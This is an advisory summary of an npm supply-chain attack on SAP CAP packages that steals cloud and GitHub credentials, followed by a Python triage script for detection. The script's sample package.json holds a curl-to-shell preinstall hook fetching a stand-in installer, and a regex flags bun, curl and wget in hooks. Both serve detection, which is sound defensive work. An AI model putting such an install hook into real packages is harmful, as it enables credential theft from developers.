A new npm supply-chain attack is targeting SAP CAP developer packages (@cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, mbt). Compromised versions inject a preinstall hook that downloads the Bun runtime and executes an 11.7 MB obfuscated credential stealer. The payload harvests GitHub tokens, npm tokens, AWS/Azure/GCP/Kubernetes secrets, GitHub Actions secrets, and local developer credentials. Stolen data is encrypted with AES-256-GCM and exfiltrated via newly created public GitHub repositories with Dune-themed names. The malware also propagates by modifying release tarballs and pushing backdoor files into repositories using stolen tokens, masquerading as Claude commits. Detection involves searching for specific package versions, file names, and the propagation keyword 'OhNoWhatsGoingOnWithGitHub' in GitHub commits. Affected users should immediately rotate all secrets across GitHub, npm, and cloud providers.
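The detection guidance above (search for the targeted package names, look for an injected preinstall hook that pulls in Bun, and grep commit history for the propagation keyword) can be scripted as a local triage check. The following is an added example written for this page, not Aikido's scanner or any code from the campaign; the lockfile, package.json and git log inputs are constructed samples, and the compromised version map is a placeholder that must be filled from the advisory's Indicators Of Compromise list, since this summary does not state the affected version numbers.

```python
import re

# Packages the summary names as targeted by the campaign
AFFECTED_PACKAGES = {"@cap-js/sqlite", "@cap-js/postgres", "@cap-js/db-service", "mbt"}
# Propagation keyword the campaign leaves in commit messages
PROPAGATION_KEYWORD = "OhNoWhatsGoingOnWithGitHub"


def find_affected_packages(lockfile, compromised_versions):
    """Scan a parsed package-lock.json (lockfileVersion 2/3) for targeted packages.

    Returns a list of (name, version, status): "compromised" when the installed
    version is listed in compromised_versions[name], otherwise "review" so that
    an analyst still looks at any install of a targeted package.
    """
    hits = []
    for path, meta in lockfile.get("packages", {}).items():
        if not path:  # the "" key is the root project entry, not a dependency
            continue
        name = path.split("node_modules/")[-1]
        if name in AFFECTED_PACKAGES:
            version = meta.get("version", "")
            bad = version in compromised_versions.get(name, set())
            hits.append((name, version, "compromised" if bad else "review"))
    return hits


def suspicious_preinstall(package_json):
    """Flag a preinstall hook that references the Bun runtime or a downloader.

    The compromised versions run their payload from a preinstall hook that
    fetches Bun; a legitimate database adapter has no reason to do either.
    """
    hook = package_json.get("scripts", {}).get("preinstall", "")
    return bool(re.search(r"\b(bun|curl|wget)\b", hook))


def find_propagation_commits(git_log):
    """Return hashes of commits whose subject carries the propagation keyword.

    git_log is the text output of `git log --format='%H %s'`.
    """
    found = []
    for line in git_log.splitlines():
        sha, _, subject = line.partition(" ")
        if PROPAGATION_KEYWORD in subject:
            found.append(sha)
    return found


# Constructed sample inputs for the demonstration (not real package data or commits)
SAMPLE_LOCKFILE = {
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app"},
        "node_modules/@cap-js/sqlite": {"version": "9.9.9"},
        "node_modules/@cap-js/postgres": {"version": "1.0.0"},
        "node_modules/express": {"version": "4.19.2"},
    },
}
# Placeholder: replace with the version numbers from the advisory's IoC list
PLACEHOLDER_COMPROMISED = {"@cap-js/sqlite": {"9.9.9"}}

SAMPLE_PACKAGE_JSON = {
    "name": "@cap-js/sqlite",
    "scripts": {"preinstall": "curl -fsSL https://example.invalid/install-bun.sh | sh && bun run setup.js"},
}

SAMPLE_GIT_LOG = """\
a1b2c3d4 fix: bump deps
deadbeef chore: update OhNoWhatsGoingOnWithGitHub
0badf00d docs: readme tweak
"""

if __name__ == "__main__":
    for name, version, status in find_affected_packages(SAMPLE_LOCKFILE, PLACEHOLDER_COMPROMISED):
        print(f"{status:11} {name}@{version}")
    print("suspicious preinstall:", suspicious_preinstall(SAMPLE_PACKAGE_JSON))
    print("propagation commits:", find_propagation_commits(SAMPLE_GIT_LOG))
```

In practice, feed `find_affected_packages` with `json.load(open("package-lock.json"))`, run `suspicious_preinstall` over the `package.json` of each installed package under `node_modules`, and pipe `git log --all --format='%H %s'` into `find_propagation_commits`; a "compromised" hit or a keyword match means the secrets listed in the summary should be treated as exposed and rotated.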
Table of contents

- What Happened
- How The Malware Runs
- What It Steals
- GitHub Exfiltration And Propagation Keyword
- Propagation Logic
- SAP As a Target
- Detection And Mitigation
- How Aikido Detects This
- Indicators Of Compromise